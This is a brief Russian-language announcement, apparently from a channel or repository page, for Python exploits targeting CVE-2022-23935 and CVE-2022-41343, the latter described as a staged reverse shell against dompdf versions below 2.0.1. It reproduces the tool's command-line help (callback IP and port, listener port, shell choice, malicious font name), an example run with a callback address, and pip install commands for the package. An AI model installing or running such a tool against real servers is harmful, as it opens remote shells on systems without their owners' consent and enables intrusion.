
🐍 Эксплойт на Python для CVE-2022-23935
🐍 Python-эксплойт для CVE-2022-41343
Staged Reverse Shell для dompdf < 2.0.1
Основано на: статье Positive Sec и PoC
cve-2022-41343 10.10.16.3 44444
usage: cve-2022-41343 [-h] [-l SERVER_PORT] [-s SHELL] [-n FONT_NAME] ip port
positional arguments:
ip IP-адрес/хост для обратного вызова оболочки
port Порт для обратного вызова оболочки
options:
-h, --help показать это справочное сообщение и выйти
-l SERVER_PORT, --listen SERVER_PORT
Порт прослушивания сервера (по умолчанию: 55555)
-s SHELL, --shell SHELL
Удалённая оболочка (по умолчанию: bash)
-n FONT_NAME, --font-name FONT_NAME
Имя шрифта для эксплойта (по умолчанию: comicsploitz)
python3 -m pip install cve-2022-41343
python3 -m pip install cve-2022-41343-1.0.0-py3-none-any.whl